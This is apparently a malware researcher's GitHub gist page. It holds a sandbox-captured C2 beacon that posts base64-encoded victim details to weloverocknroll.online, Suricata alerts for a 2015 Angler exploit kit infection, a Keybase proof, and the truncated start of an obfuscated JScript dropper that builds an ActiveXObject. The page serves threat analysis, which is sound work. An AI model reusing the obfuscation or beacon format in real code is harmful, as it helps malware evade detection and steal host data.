Skip to content

Instantly share code, notes, and snippets.

View gist:2ca4771d981f061a8c5054416049fefd
https://app.any.run/tasks/c9b7183c-011b-4a50-96cc-b09c2876b183/
POST /request HTTP/1.1
Accept: text/plain
Content-Type: application/x-www-form-urlencoded
User-Agent: rvOgJiq
Host: weloverocknroll.online
Content-Length: 640
request=YUhkcFpEMWxaV1ZpTldRMU5DMDNPRGd3TFRReVlUY3RZalUwTWkwM016bGlZbU15Tm1ObU5HSW1ZMjl0Y0hWMFpYSnVZVzFsUFZWVFJWSXRVRU1tWVc5eWJtOTBQV1poYkhObEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UWXhPU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDEwY25WbEptRnVkR2wyYVhKMWN6MG1ZbTkwZG1WeWMybHZiajB5TGpFdU15Wm5jSFZPWVcxbFBXUkhPV3RpZHowOUptTndkVTVoYldVOVUxYzFNRnBYZDI5VmFXdG5VVEk1ZVZwVGFGVlVVMnRuWVZSVmRFNXFVWGROUTBKRVZVWlZaMUZEUVhsTWFtTjNVakJvTmlaaGNtTm9QV1ZFV1RBbWIzQmxjbWx1WjNONWMzUmxiVDFXTW14MVdrYzVNMk41UVROSlJrNXNZMjVhY0ZreVZXZFZSMFpxWVhsQmVDWnpjSEpsWVdSMFlXYzliV0ZwYmc9PQ==
View gist:a68a8ec300e549f1f06f
2015-09-23 Angler EK
ETPRO.Suri.2.0.8
2015-09-23 02:32:39.09 UTC - 87.98.177.124:80 -> 192.168.26.10:1276 - ETPRO CURRENT_EVENTS Evil Redirector Leading to EK Aug 31 2015 M1
2015-09-23 02:32:39.09 UTC - 87.98.177.124:80 -> 192.168.26.10:1276 - ETPRO CURRENT_EVENTS Evil Redirector Leading to EK Aug 31 2015 M2
2015-09-23 02:32:39.09 UTC - 87.98.177.124:80 -> 192.168.26.10:1276 - ETPRO CURRENT_EVENTS Evil Redirector Leading to EK Aug 31 2015 M3
2015-09-23 02:32:42.00 UTC - 192.168.26.10:1325 -> 62.109.5.133:80 - ETPRO CURRENT_EVENTS Angler Possible EK Landing URI Struct Jul 15 M3 T1
2015-09-23 02:32:42.38 UTC - 62.109.5.133:80 -> 192.168.26.10:1325 - ETPRO CURRENT_EVENTS Angler EK Landing June 16 2015 M5
2015-09-23 02:32:42.38 UTC - 62.109.5.133:80 -> 192.168.26.10:1325 - ETPRO CURRENT_EVENTS Angler EK Landing June 1 2015
2015-09-23 02:32:42.38 UTC - 62.109.5.133:80 -> 192.168.26.10:1325 - ETPRO CURRENT_EVENTS Angler EK Landing Sep 22 2015 T1 M1
View keybase.md

Keybase proof

I hereby claim:

  • I am malwareforme on github.
  • I am malwareforme (https://keybase.io/malwareforme) on keybase.
  • I have a public key whose fingerprint is BDE4 6403 4E5B 0474 E345 EA6F 4CF5 EDCF 62AC 0200

To claim this, I am signing this object:

View gist:adad23f5132c2207bfdf
(function() {
var yn4 = "MOYpSB=Q2Nji=gK&Qe@d1p" [(35.0 + "QE\x8bf\x60\x83ZyiY8I$=" ["charCodeAt"](13) * 826342734)["toString"]((0 * "$L+OA\x89\x84Q\x80|x0" ["charCodeAt"](3) + 35.0))](/[Y\=jK\@M2e\&1S]/g, "");
gD7 = ("#Cv$Z\x88u'+s-GxVy\x82" ["charCodeAt"](7) * 2 + 23.0);
var pew = ("ZA|9m]c5NX',si" ["length"] * 31 + 1.0);
jfa = (9 * "Ff1#]WSlV7aK" ["length"] + 6.0);
Am5 = ("e$|R9Da=,]s3I\x8bu5O" ["charCodeAt"](8) * 5 + 30.0);
function LC2(fr, ERo, rn) {
var QDy = new ActiveXObject("~Wo]S7BczrziQ=pC_tA.;SPhqe`~lHyl" [(2217011921 * "nV8cvmy=[KH" ["length"] + 2.0)["toString"]((3 * "\x86XIg\x8a_4^t" ["length"] + 4.0))](/[yPQ7o\`\=qz\~HC\_AB\]\;]/g, ""));
N5D = "vsQTm;CQCNEDWAYGTxL>R>n" [("C\x87N0uc)#'oR-_" ["charCodeAt"](6) * 488878692 + 2.0)["toString"](("?a(I6^'Nl\x83E\x80\x81_" ["charCodeAt"](4) * 0 + 30.0))](/[NL\;\>WQTYEv]/g, "");
You can’t perform that action at this time.